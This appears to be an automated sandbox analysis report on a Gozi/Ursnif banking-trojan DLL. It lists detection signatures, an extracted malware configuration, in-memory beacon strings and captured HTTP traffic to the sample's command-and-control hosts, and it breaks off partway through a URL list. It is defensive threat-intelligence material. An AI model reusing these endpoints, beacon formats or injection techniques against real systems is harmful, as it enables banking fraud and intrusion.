Analysis Report onerous.tar.dll

Overview

General Information

Sample Name:	onerous.tar.dll
Analysis ID:	322295
MD5:	79d81979dbbd1c8ceb04cc80a903ecd1
SHA1:	f40959018e132fb1430f77a26903af222244676c
SHA256:	5dd2f21b81330a342fe1bb9a17a8fde423928e266d4842887f8b41e5d7c2fbd6
Tags:	dll
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected Gozi e-Banking trojan

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a COM Internet Explorer object

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: onerous.tar.dll

Avira: detected

Found malware configuration

Source: loaddll32.exe.6780.0.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "158", "system": "75b51dd63c757ef7e1ccbbde1d12750dhh%`", "size": "200775", "crc": "2", "action": "00000000", "id": "1100", "time": "1606281604", "user": "f73be0088695dc15e71ab15cb33c1faf", "hash": "0xa9e7194b", "soft": "3"}

Multi AV Scanner detection for domain / URL

Source: c56.lepini.at	Virustotal: Detection: 12%			Perma Link
Source: api10.laptok.at	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for submitted file

Source: onerous.tar.dll	Virustotal: Detection: 47%			Perma Link
Source: onerous.tar.dll	ReversingLabs: Detection: 58%

Machine Learning detection for sample

Source: onerous.tar.dll

Joe Sandbox ML: detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00458A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_00458A61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00443DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_00443DEE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00456E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_00456E86

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00461C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

0_2_00461C05

Networking:

Creates a COM Internet Explorer object

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Found Tor onion address

Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp	String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: global traffic	HTTP traffic detected: GET /api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wfxlV_2BR_/2BKRWfbGdbKpccDlq/wjU_2FWdPQ1P/mnarl1yMJqa/qdhNVoh3oOz5bs/z60RqTSIuCKm6aR4446gj/CWuUplffN3IjYKGv/jAh08Sky_2BsVaS/mR26uhXrf_2FPOtRsi/kAWpATwOt/nHT1d49Zze7GI739MC4q/fqUVMDgzP8AWQSOV_2B/UYhCEI1zFK8E9H5v_0A_0D/bl8Ojy2x17tuP/HyuqS2KW/QxDOc9ASBROfBvf26kniC8O/wYs HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2BId1l8xoRD/ZIKmgZ4Hr1ogBm_2Ft/cJTdN_2F0/sOkKUhNEij9EeyBjgxaS/fAWTeONzVOzjyGfrZxL/sesogOMoxfuQAI6mdY73Xa/BaJEnujvmw_2B/vRpLGOj_/2Bvahak4rScm4JpMfQfaO8m/3X9wT7Vyfk/qviTv3J0IbAJn2nUb/wbGIEFwb6Ch2/LDOx1illPXc/Hz_2BbvAx_2Fcr/j_0A_0DiinRm69PA4aJZ4/DJR7fgT5XYyNTfe4/_2FOY_2B_2/BAPo2cJ8YkUi/c HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Nov 2020 20:19:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000021.00000000.419863199.000000000F589000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/ap=j%E/
Source: ~DFCE3757A75A0E50D1.TMP.3.dr, {C152A990-2EDD-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://api10.laptok.at/api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wf
Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/S
Source: {E26E6CA8-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.dr	String found in binary or memory: http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2B
Source: {DC6A3E21-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.dr	String found in binary or memory: http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpM
Source: {DC6A3E1F-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.dr, ~DFAC17D42899691A13.TMP.20.dr	String found in binary or memory: http://api10.laptok.at/api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4Dr
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000021.00000002.1158802140.0000000001464000.00000004.00000020.sdmp	String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat6
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000021.00000000.419834945.000000000F559000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000001A.00000003.397786087.000002A59CD6E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
